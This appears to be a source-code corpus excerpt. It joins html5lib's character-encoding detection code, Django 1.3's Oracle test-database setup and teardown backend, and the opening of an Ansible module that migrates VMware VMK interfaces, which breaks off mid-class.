        EOF when EOF is reached.
        """
        # Read a new chunk from the input stream if necessary
        if self.chunkOffset >= self.chunkSize:
            if not self.readChunk():
                return EOF
        chunkOffset = self.chunkOffset
        char = self.chunk[chunkOffset]
        self.chunkOffset = chunkOffset + 1
        return char
    def readChunk(self, chunkSize=None):
        """Refill self.chunk from the data stream, normalising newlines and
        invalid characters; return False once the stream is exhausted."""
        if chunkSize is None:
            chunkSize = self._defaultChunkSize
        self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
        self.chunk = ""
        self.chunkSize = 0
        self.chunkOffset = 0
        data = self.dataStream.read(chunkSize)
        # Deal with CR LF and surrogates broken across chunks
        if self._bufferedCharacter:
            data = self._bufferedCharacter + data
            self._bufferedCharacter = None
        elif not data:
            # We have no more data, bye-bye stream
            return False
        if len(data) > 1:
            # Hold back a trailing CR or high surrogate so it can be joined
            # with the first character of the next chunk.
            lastv = ord(data[-1])
            if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
                self._bufferedCharacter = data[-1]
                data = data[:-1]
        self.reportCharacterErrors(data)
        # Replace invalid characters
        # Note U+0000 is dealt with in the tokenizer
        data = self.replaceCharactersRegexp.sub("\ufffd", data)
        data = data.replace("\r\n", "\n")
        data = data.replace("\r", "\n")
        self.chunk = data
        self.chunkSize = len(data)
        return True
    def characterErrorsUCS4(self, data):
        # Wide build: every match of invalid_unicode_re is a real error.
        for i in range(len(invalid_unicode_re.findall(data))):
            self.errors.append("invalid-codepoint")
    def characterErrorsUCS2(self, data):
        # Someone picked the wrong compile option
        # You lose
        skip = False
        for match in invalid_unicode_re.finditer(data):
            # NOTE(review): `skip` is only cleared in the final else branch,
            # never on the skipped (low surrogate) match itself — confirm
            # against upstream html5lib whether that is intended.
            if skip:
                continue
            codepoint = ord(match.group())
            pos = match.start()
            # Pretty sure there should be endianness issues here
            if utils.isSurrogatePair(data[pos:pos + 2]):
                # We have a surrogate pair!
                char_val = utils.surrogatePairToCodepoint(data[pos:pos + 2])
                if char_val in non_bmp_invalid_codepoints:
                    self.errors.append("invalid-codepoint")
                skip = True
            elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
                  pos == len(data) - 1):
                # Lone surrogate at the very end of the data.
                self.errors.append("invalid-codepoint")
            else:
                skip = False
                self.errors.append("invalid-codepoint")
    def charsUntil(self, characters, opposite=False):
        """ Returns a string of characters from the stream up to but not
        including any character in 'characters' or EOF. 'characters' must be
        a container that supports the 'in' method and iteration over its
        characters.
        """
        # Use a cache of regexps to find the required characters
        try:
            chars = charsUntilRegEx[(characters, opposite)]
        except KeyError:
            if __debug__:
                for c in characters:
                    assert(ord(c) < 128)
            regex = "".join(["\\x%02x" % ord(c) for c in characters])
            if not opposite:
                regex = "^%s" % regex
            chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
        rv = []
        while True:
            # Find the longest matching prefix
            m = chars.match(self.chunk, self.chunkOffset)
            if m is None:
                # If nothing matched, and it wasn't because we ran out of chunk,
                # then stop
                if self.chunkOffset != self.chunkSize:
                    break
            else:
                end = m.end()
                # If not the whole chunk matched, return everything
                # up to the part that didn't match
                if end != self.chunkSize:
                    rv.append(self.chunk[self.chunkOffset:end])
                    self.chunkOffset = end
                    break
                # If the whole remainder of the chunk matched,
                # use it all and read the next chunk
                rv.append(self.chunk[self.chunkOffset:])
            if not self.readChunk():
                # Reached EOF
                break
        r = "".join(rv)
        return r
    def unget(self, char):
        # Only one character is allowed to be ungotten at once - it must
        # be consumed again before any further call to unget
        if char is not None:
            if self.chunkOffset == 0:
                # unget is called quite rarely, so it's a good idea to do
                # more work here if it saves a bit of work in the frequently
                # called char and charsUntil.
                # So, just prepend the ungotten character onto the current
                # chunk:
                self.chunk = char + self.chunk
                self.chunkSize += 1
            else:
                self.chunkOffset -= 1
                assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
    """Provides a unicode stream of characters to the HTMLTokenizer.
    This class takes care of character encoding and removing or replacing
    incorrect byte-sequences and also provides column and line tracking.
    """
    def __init__(self, source, encoding=None, parseMeta=True, chardet=True):
        """Initialises the HTMLInputStream.
        HTMLInputStream(source, [encoding]) -> Normalized stream from source
        for use by html5lib.
        source can be either a file-object, local filename or a string.
        The optional encoding parameter must be a string that indicates
        the encoding. If specified, that encoding will be used,
        regardless of any BOM or later declaration (such as in a meta
        element)
        parseMeta - Look for a <meta> element containing encoding information
        """
        # Raw Stream - for unicode objects this will encode to utf-8 and set
        # self.charEncoding as appropriate
        self.rawStream = self.openStream(source)
        HTMLUnicodeInputStream.__init__(self, self.rawStream)
        self.charEncoding = (codecName(encoding), "certain")
        # Encoding Information
        # Number of bytes to use when looking for a meta element with
        # encoding information
        self.numBytesMeta = 512
        # Number of bytes to use when using detecting encoding using chardet
        self.numBytesChardet = 100
        # Encoding to use if no other information can be found
        self.defaultEncoding = "windows-1252"
        # Detect encoding iff no explicit "transport level" encoding is supplied
        if (self.charEncoding[0] is None):
            self.charEncoding = self.detectEncoding(parseMeta, chardet)
        # Call superclass
        self.reset()
    def reset(self):
        # Re-wrap the raw byte stream with a decoder for the detected
        # encoding; undecodable bytes become U+FFFD ('replace').
        self.dataStream = codecs.getreader(self.charEncoding[0])(self.rawStream,
                                                                 'replace')
        HTMLUnicodeInputStream.reset(self)
    def openStream(self, source):
        """Produces a file object from source.
        source can be either a file object, local filename or a string.
        """
        # Already a file object
        if hasattr(source, 'read'):
            stream = source
        else:
            stream = BytesIO(source)
        try:
            stream.seek(stream.tell())
        except:
            # NOTE(review): bare except — any failure here (not just a
            # missing/broken seek) silently falls back to BufferedStream.
            stream = BufferedStream(stream)
        return stream
    def detectEncoding(self, parseMeta=True, chardet=True):
        """Determine the character encoding: BOM, then <meta> prescan, then
        chardet/charade if installed, then the windows-1252 default."""
        # First look for a BOM
        # This will also read past the BOM if present
        encoding = self.detectBOM()
        confidence = "certain"
        # If there is no BOM need to look for meta elements with encoding
        # information
        if encoding is None and parseMeta:
            encoding = self.detectEncodingMeta()
            confidence = "tentative"
        # Guess with chardet, if avaliable
        if encoding is None and chardet:
            confidence = "tentative"
            try:
                try:
                    from charade.universaldetector import UniversalDetector
                except ImportError:
                    from chardet.universaldetector import UniversalDetector
                buffers = []
                detector = UniversalDetector()
                while not detector.done:
                    buffer = self.rawStream.read(self.numBytesChardet)
                    assert isinstance(buffer, bytes)
                    if not buffer:
                        break
                    buffers.append(buffer)
                    detector.feed(buffer)
                detector.close()
                encoding = detector.result['encoding']
                self.rawStream.seek(0)
            except ImportError:
                # Neither detector library is installed; fall through.
                pass
        # If all else fails use the default encoding
        if encoding is None:
            confidence = "tentative"
            encoding = self.defaultEncoding
        # Substitute for equivalent encodings:
        encodingSub = {"iso-8859-1": "windows-1252"}
        if encoding.lower() in encodingSub:
            encoding = encodingSub[encoding.lower()]
        return encoding, confidence
    def changeEncoding(self, newEncoding):
        """Switch to a later-declared encoding, rewinding and raising
        ReparseException when the stream must be re-parsed."""
        assert self.charEncoding[1] != "certain"
        newEncoding = codecName(newEncoding)
        if newEncoding in ("utf-16", "utf-16-be", "utf-16-le"):
            newEncoding = "utf-8"
        if newEncoding is None:
            return
        elif newEncoding == self.charEncoding[0]:
            self.charEncoding = (self.charEncoding[0], "certain")
        else:
            self.rawStream.seek(0)
            self.reset()
            self.charEncoding = (newEncoding, "certain")
            # NOTE(review): self.charEncoding was reassigned just above, so
            # both fields of this message show the new encoding — confirm
            # whether the old encoding was meant here.
            raise ReparseException("Encoding changed from %s to %s" % (self.charEncoding[0], newEncoding))
    def detectBOM(self):
        """Attempts to detect at BOM at the start of the stream. If
        an encoding can be determined from the BOM return the name of the
        encoding otherwise return None"""
        bomDict = {
            codecs.BOM_UTF8: 'utf-8',
            codecs.BOM_UTF16_LE: 'utf-16-le', codecs.BOM_UTF16_BE: 'utf-16-be',
            codecs.BOM_UTF32_LE: 'utf-32-le', codecs.BOM_UTF32_BE: 'utf-32-be'
        }
        # Go to beginning of file and read in 4 bytes
        string = self.rawStream.read(4)
        assert isinstance(string, bytes)
        # Try detecting the BOM using bytes from the string
        encoding = bomDict.get(string[:3])  # UTF-8
        seek = 3
        if not encoding:
            # Need to detect UTF-32 before UTF-16
            encoding = bomDict.get(string)  # UTF-32
            seek = 4
            if not encoding:
                encoding = bomDict.get(string[:2])  # UTF-16
                seek = 2
        # Set the read position past the BOM if one was found, otherwise
        # set it to the start of the stream
        self.rawStream.seek(encoding and seek or 0)
        return encoding
    def detectEncodingMeta(self):
        """Report the encoding declared by the meta element
        """
        # Only the first numBytesMeta bytes are prescanned; the stream is
        # rewound afterwards.
        buffer = self.rawStream.read(self.numBytesMeta)
        assert isinstance(buffer, bytes)
        parser = EncodingParser(buffer)
        self.rawStream.seek(0)
        encoding = parser.getEncoding()
        if encoding in ("utf-16", "utf-16-be", "utf-16-le"):
            encoding = "utf-8"
        return encoding
class EncodingBytes(bytes):
    """String-like object with an associated position and various extra methods
    If the position is ever greater than the string length then an exception is
    raised"""
    def __new__(self, value):
        # `self` here is actually the class (bytes.__new__ protocol).  The
        # stored bytes are lower-cased so later matching is case-insensitive.
        assert isinstance(value, bytes)
        return bytes.__new__(self, value.lower())
    def __init__(self, value):
        # Position starts one byte before the data; the first next() call
        # advances onto index 0.
        self._position = -1
    def __iter__(self):
        return self
    def __next__(self):
        p = self._position = self._position + 1
        if p >= len(self):
            raise StopIteration
        elif p < 0:
            raise TypeError
        return self[p:p + 1]
    def next(self):
        # Py2 compat
        return self.__next__()
    def previous(self):
        """Step back one byte and return it (as a length-1 bytes)."""
        p = self._position
        if p >= len(self):
            raise StopIteration
        elif p < 0:
            raise TypeError
        self._position = p = p - 1
        return self[p:p + 1]
    def setPosition(self, position):
        if self._position >= len(self):
            raise StopIteration
        self._position = position
    def getPosition(self):
        if self._position >= len(self):
            raise StopIteration
        if self._position >= 0:
            return self._position
        else:
            return None
    position = property(getPosition, setPosition)
    def getCurrentByte(self):
        return self[self.position:self.position + 1]
    currentByte = property(getCurrentByte)
    def skip(self, chars=spaceCharactersBytes):
        """Skip past a list of characters"""
        p = self.position  # use property for the error-checking
        while p < len(self):
            c = self[p:p + 1]
            if c not in chars:
                self._position = p
                return c
            p += 1
        self._position = p
        return None
    def skipUntil(self, chars):
        """Advance to the first byte in `chars` and return it, or None if
        the end of the data is reached first."""
        p = self.position
        while p < len(self):
            c = self[p:p + 1]
            if c in chars:
                self._position = p
                return c
            p += 1
        self._position = p
        return None
    def matchBytes(self, bytes):
        """Look for a sequence of bytes at the start of a string. If the bytes
        are found return True and advance the position to the byte after the
        match. Otherwise return False and leave the position alone"""
        p = self.position
        data = self[p:p + len(bytes)]
        rv = data.startswith(bytes)
        if rv:
            self.position += len(bytes)
        return rv
    def jumpTo(self, bytes):
        """Look for the next sequence of bytes matching a given sequence. If
        a match is found advance the position to the last byte of the match"""
        newPosition = self[self.position:].find(bytes)
        if newPosition > -1:
            # XXX: This is ugly, but I can't see a nicer way to fix this.
            if self._position == -1:
                self._position = 0
            self._position += (newPosition + len(bytes) - 1)
            return True
        else:
            raise StopIteration
class EncodingParser(object):
    """Mini parser for detecting character encoding from meta elements"""
    def __init__(self, data):
        """string - the data to work on for encoding detection"""
        self.data = EncodingBytes(data)
        self.encoding = None
    def getEncoding(self):
        """Scan the byte prefix and return the declared encoding, or None."""
        # Dispatch table: more specific prefixes come first so that b"<"
        # does not shadow b"<meta", b"<!--", etc.
        methodDispatch = (
            (b"<!--", self.handleComment),
            (b"<meta", self.handleMeta),
            (b"</", self.handlePossibleEndTag),
            (b"<!", self.handleOther),
            (b"<?", self.handleOther),
            (b"<", self.handlePossibleStartTag))
        for byte in self.data:
            keepParsing = True
            for key, method in methodDispatch:
                if self.data.matchBytes(key):
                    try:
                        keepParsing = method()
                        break
                    except StopIteration:
                        # Ran off the end of the available bytes.
                        keepParsing = False
                        break
            if not keepParsing:
                break
        return self.encoding
    def handleComment(self):
        """Skip over comments"""
        return self.data.jumpTo(b"-->")
    def handleMeta(self):
        """Inspect a <meta> element's attributes for an encoding declaration."""
        if self.data.currentByte not in spaceCharactersBytes:
            # if we have <meta not followed by a space so just keep going
            return True
        # We have a valid meta element we want to search for attributes
        hasPragma = False
        pendingEncoding = None
        while True:
            # Try to find the next attribute after the current position
            attr = self.getAttribute()
            if attr is None:
                return True
            else:
                if attr[0] == b"http-equiv":
                    hasPragma = attr[1] == b"content-type"
                    if hasPragma and pendingEncoding is not None:
                        # The content-type pragma arrived after a content
                        # attribute that already carried a charset.
                        self.encoding = pendingEncoding
                        return False
                elif attr[0] == b"charset":
                    tentativeEncoding = attr[1]
                    codec = codecName(tentativeEncoding)
                    if codec is not None:
                        self.encoding = codec
                        return False
                elif attr[0] == b"content":
                    contentParser = ContentAttrParser(EncodingBytes(attr[1]))
                    tentativeEncoding = contentParser.parse()
                    if tentativeEncoding is not None:
                        codec = codecName(tentativeEncoding)
                        if codec is not None:
                            if hasPragma:
                                self.encoding = codec
                                return False
                            else:
                                # Remember the charset until a content-type
                                # pragma confirms the declaration.
                                pendingEncoding = codec
    def handlePossibleStartTag(self):
        return self.handlePossibleTag(False)
    def handlePossibleEndTag(self):
        next(self.data)
        return self.handlePossibleTag(True)
    def handlePossibleTag(self, endTag):
        data = self.data
        if data.currentByte not in asciiLettersBytes:
            # If the next byte is not an ascii letter either ignore this
            # fragment (possible start tag case) or treat it according to
            # handleOther
            if endTag:
                data.previous()
                self.handleOther()
            return True
        c = data.skipUntil(spacesAngleBrackets)
        if c == b"<":
            # return to the first step in the overall "two step" algorithm
            # reprocessing the < byte
            data.previous()
        else:
            # Read all attributes
            attr = self.getAttribute()
            while attr is not None:
                attr = self.getAttribute()
        return True
    def handleOther(self):
        return self.data.jumpTo(b">")
    def getAttribute(self):
        """Return a name,value pair for the next attribute in the stream,
        if one is found, or None"""
        # The numbered steps below follow the HTML spec's "get an attribute"
        # prescan algorithm.
        data = self.data
        # Step 1 (skip chars)
        c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
        assert c is None or len(c) == 1
        # Step 2
        if c in (b">", None):
            return None
        # Step 3
        attrName = []
        attrValue = []
        # Step 4 attribute name
        while True:
            if c == b"=" and attrName:
                break
            elif c in spaceCharactersBytes:
                # Step 6!
                c = data.skip()
                break
            elif c in (b"/", b">"):
                return b"".join(attrName), b""
            elif c in asciiUppercaseBytes:
                attrName.append(c.lower())
            elif c is None:
                return None
            else:
                attrName.append(c)
            # Step 5
            c = next(data)
        # Step 7
        if c != b"=":
            data.previous()
            return b"".join(attrName), b""
        # Step 8
        next(data)
        # Step 9
        c = data.skip()
        # Step 10
        if c in (b"'", b'"'):
            # 10.1
            quoteChar = c
            while True:
                # 10.2
                c = next(data)
                # 10.3
                if c == quoteChar:
                    next(data)
                    return b"".join(attrName), b"".join(attrValue)
                # 10.4
                elif c in asciiUppercaseBytes:
                    attrValue.append(c.lower())
                # 10.5
                else:
                    attrValue.append(c)
        elif c == b">":
            return b"".join(attrName), b""
        elif c in asciiUppercaseBytes:
            attrValue.append(c.lower())
        elif c is None:
            return None
        else:
            attrValue.append(c)
        # Step 11
        while True:
            c = next(data)
            if c in spacesAngleBrackets:
                return b"".join(attrName), b"".join(attrValue)
            elif c in asciiUppercaseBytes:
                attrValue.append(c.lower())
            elif c is None:
                return None
            else:
                attrValue.append(c)
class ContentAttrParser(object):
    """Extract the charset value from a meta "content" attribute value."""
    def __init__(self, data):
        # data must in practice be an EncodingBytes instance — parse() uses
        # its position/skip/jumpTo API, not just plain bytes.
        assert isinstance(data, bytes)
        self.data = data
    def parse(self):
        """Return the encoding label as bytes, or None if none is found."""
        try:
            # Check if the attr name is charset
            # otherwise return
            self.data.jumpTo(b"charset")
            self.data.position += 1
            self.data.skip()
            if not self.data.currentByte == b"=":
                # If there is no = sign keep looking for attrs
                return None
            self.data.position += 1
            self.data.skip()
            # Look for an encoding between matching quote marks
            if self.data.currentByte in (b'"', b"'"):
                quoteMark = self.data.currentByte
                self.data.position += 1
                oldPosition = self.data.position
                if self.data.jumpTo(quoteMark):
                    return self.data[oldPosition:self.data.position]
                else:
                    return None
            else:
                # Unquoted value
                oldPosition = self.data.position
                try:
                    self.data.skipUntil(spaceCharactersBytes)
                    return self.data[oldPosition:self.data.position]
                except StopIteration:
                    # Return the whole remaining value
                    return self.data[oldPosition:]
        except StopIteration:
            # "charset" never appeared, or we ran off the end of the data.
            return None
def codecName(encoding):
    """Map an encoding label (str or ASCII bytes) to its Python codec
    name, or None when the label is empty, undecodable or unknown."""
    if isinstance(encoding, bytes):
        try:
            encoding = encoding.decode("ascii")
        except UnicodeDecodeError:
            # Non-ASCII bytes can never name a valid encoding.
            return None
    if not encoding:
        return None
    # Strip ASCII whitespace/punctuation and fold case before the lookup.
    canonical = ascii_punctuation_re.sub("", encoding).lower()
    return encodings.get(canonical, None)
| mpl-2.0 |
dvliman/jaikuengine | .google_appengine/lib/django-1.3/django/db/backends/oracle/creation.py | 153 | 11808 | import sys, time
from django.db.backends.creation import BaseDatabaseCreation
# Prefix prepended to the production names to build test DB/user/tablespace names.
TEST_DATABASE_PREFIX = 'test_'
# Fallback password for the auto-created Oracle test user.
PASSWORD = 'Im_a_lumberjack'
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BooleanField': 'NUMBER(1) CHECK (%(qn_column)s IN (0,1))',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'NullBooleanField': 'NUMBER(1) CHECK ((%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL))',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'PositiveSmallIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
}
def __init__(self, connection):
self.remember = {}
super(DatabaseCreation, self).__init__(connection)
def _create_test_db(self, verbosity=1, autoclobber=False):
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
self.remember['user'] = self.connection.settings_dict['USER']
self.remember['passwd'] = self.connection.settings_dict['PASSWORD']
cursor = self.connection.cursor()
if self._test_database_create():
try:
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_NAME)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test database '%s'..." % self.connection.alias
self._execute_test_db_destruction(cursor, parameters, verbosity)
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
if self._test_user_create():
if verbosity >= 1:
print "Creating test user..."
try:
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test user: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test user, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_USER)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test user..."
self._destroy_test_user(cursor, parameters, verbosity)
if verbosity >= 1:
print "Creating test user..."
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test user: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
self.connection.settings_dict['TEST_USER'] = self.connection.settings_dict["USER"] = TEST_USER
self.connection.settings_dict["PASSWORD"] = TEST_PASSWD
return self.connection.settings_dict['NAME']
def _destroy_test_db(self, test_database_name, verbosity=1):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
self.connection.settings_dict["USER"] = self.remember['user']
self.connection.settings_dict["PASSWORD"] = self.remember['passwd']
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
time.sleep(1) # To avoid "database is being accessed by other users" errors.
if self._test_user_create():
if verbosity >= 1:
print 'Destroying test user...'
self._destroy_test_user(cursor, parameters, verbosity)
if self._test_database_create():
if verbosity >= 1:
print 'Destroying test database tables...'
self._execute_test_db_destruction(cursor, parameters, verbosity)
self.connection.close()
def _execute_test_db_creation(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_db(): dbname = %s" % parameters['dbname']
statements = [
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(tblspace)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 200M
""",
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(tblspace_temp)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 100M
""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _create_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_user(): username = %s" % parameters['user']
statements = [
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
""",
"""GRANT CONNECT, RESOURCE TO %(user)s""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_test_db_destruction(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_execute_test_db_destruction(): dbname=%s" % parameters['dbname']
statements = [
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _destroy_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_destroy_test_user(): user=%s" % parameters['user']
print "Be patient. This can take some time..."
statements = [
'DROP USER %(user)s CASCADE',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_statements(self, cursor, statements, parameters, verbosity):
for template in statements:
stmt = template % parameters
if verbosity >= 2:
print stmt
try:
cursor.execute(stmt)
except Exception, err:
sys.stderr.write("Failed (%s)\n" % (err))
raise
def _test_database_name(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_NAME']:
name = self.connection.settings_dict['TEST_NAME']
except AttributeError:
pass
return name
def _test_database_create(self):
return self.connection.settings_dict.get('TEST_CREATE', True)
def _test_user_create(self):
return self.connection.settings_dict.get('TEST_USER_CREATE', True)
def _test_database_user(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['USER']
try:
if self.connection.settings_dict['TEST_USER']:
name = self.connection.settings_dict['TEST_USER']
except KeyError:
pass
return name
def _test_database_passwd(self):
name = PASSWORD
try:
if self.connection.settings_dict['TEST_PASSWD']:
name = self.connection.settings_dict['TEST_PASSWD']
except KeyError:
pass
return name
def _test_database_tblspace(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_TBLSPACE']:
name = self.connection.settings_dict['TEST_TBLSPACE']
except KeyError:
pass
return name
def _test_database_tblspace_tmp(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME'] + '_temp'
try:
if self.connection.settings_dict['TEST_TBLSPACE_TMP']:
name = self.connection.settings_dict['TEST_TBLSPACE_TMP']
except KeyError:
pass
return name
def _get_test_db_name(self):
"""
We need to return the 'production' DB name to get the test DB creation
machinery to work. This isn't a great deal in this case because DB
names as handled by Django haven't real counterparts in Oracle.
"""
return self.connection.settings_dict['NAME']
def test_db_signature(self):
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME'],
self._test_database_user(),
)
| apache-2.0 |
lmprice/ansible | lib/ansible/modules/cloud/vmware/vmware_migrate_vmk.py | 25 | 7048 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Joseph Callen <jcallen () csc.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_migrate_vmk
short_description: Migrate a VMK interface from VSS to VDS
description:
- Migrate a VMK interface from VSS to VDS
version_added: 2.0
author:
- Joseph Callen (@jcpowermac)
- Russell Teague (@mtnbikenc)
notes:
- Tested on vSphere 5.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
esxi_hostname:
description:
- ESXi hostname to be managed
required: True
device:
description:
- VMK interface name
required: True
current_switch_name:
description:
- Switch VMK interface is currently on
required: True
current_portgroup_name:
description:
- Portgroup name VMK interface is currently on
required: True
migrate_switch_name:
description:
- Switch name to migrate VMK interface to
required: True
migrate_portgroup_name:
description:
- Portgroup name to migrate VMK interface to
required: True
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
# Example from Ansible playbook
- name: Migrate Management vmk
local_action:
module: vmware_migrate_vmk
hostname: vcsa_host
username: vcsa_user
password: vcsa_pass
esxi_hostname: esxi_hostname
device: vmk1
current_switch_name: temp_vswitch
current_portgroup_name: esx-mgmt
migrate_switch_name: dvSwitch
migrate_portgroup_name: Management
'''
try:
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import (vmware_argument_spec, find_dvs_by_name, find_hostsystem_by_name,
connect_to_api, find_dvspg_by_name)
class VMwareMigrateVmk(object):
    """State machine that migrates a VMK interface between a standard
    vSwitch (VSS) and a distributed vSwitch (VDS) on one ESXi host."""
    def __init__(self, module):
        # module: AnsibleModule carrying the already-validated parameters.
        self.module = module
        self.host_system = None
        self.migrate_switch_name = self.module.params['migrate_switch_name']
        self.migrate_portgroup_name = self.module.params['migrate_portgroup_name']
        self.device = self.module.params['device']
        self.esxi_hostname = self.module.params['esxi_hostname']
        self.current_portgroup_name = self.module.params['current_portgroup_name']
        self.current_switch_name = self.module.params['current_switch_name']
        # connect once; self.content is the vSphere service content root
        self.content = connect_to_api(module)
    def process_state(self):
        """Dispatch to the handler matching the VMK's current location."""
        try:
            vmk_migration_states = {
                'migrate_vss_vds': self.state_migrate_vss_vds,
                'migrate_vds_vss': self.state_migrate_vds_vss,
                'migrated': self.state_exit_unchanged
            }
            vmk_migration_states[self.check_vmk_current_state()]()
        except vmodl.RuntimeFault as runtime_fault:
            self.module.fail_json(msg=runtime_fault.msg)
        except vmodl.MethodFault as method_fault:
            self.module.fail_json(msg=method_fault.msg)
        except Exception as e:
            self.module.fail_json(msg=str(e))
    def state_exit_unchanged(self):
        # VMK already where it should be: report no change.
        self.module.exit_json(changed=False)
    def state_migrate_vds_vss(self):
        # VDS -> VSS direction is not supported yet.
        self.module.exit_json(changed=False, msg="Currently Not Implemented")
    def create_host_vnic_config(self, dv_switch_uuid, portgroup_key):
        """Build the vnic 'edit' spec that attaches the VMK device to the
        given distributed switch port group."""
        host_vnic_config = vim.host.VirtualNic.Config()
        host_vnic_config.spec = vim.host.VirtualNic.Specification()
        host_vnic_config.changeOperation = "edit"
        host_vnic_config.device = self.device
        # empty portgroup: the nic is bound via distributedVirtualPort below
        host_vnic_config.portgroup = ""
        host_vnic_config.spec.distributedVirtualPort = vim.dvs.PortConnection()
        host_vnic_config.spec.distributedVirtualPort.switchUuid = dv_switch_uuid
        host_vnic_config.spec.distributedVirtualPort.portgroupKey = portgroup_key
        return host_vnic_config
    def create_port_group_config(self):
        """Build the spec that removes the current standard-switch port group."""
        port_group_config = vim.host.PortGroup.Config()
        port_group_config.spec = vim.host.PortGroup.Specification()
        port_group_config.changeOperation = "remove"
        port_group_config.spec.name = self.current_portgroup_name
        port_group_config.spec.vlanId = -1
        port_group_config.spec.vswitchName = self.current_switch_name
        port_group_config.spec.policy = vim.host.NetworkPolicy()
        return port_group_config
    def state_migrate_vss_vds(self):
        """Move the VMK from the standard switch onto the distributed switch
        in a single UpdateNetworkConfig('modify') call."""
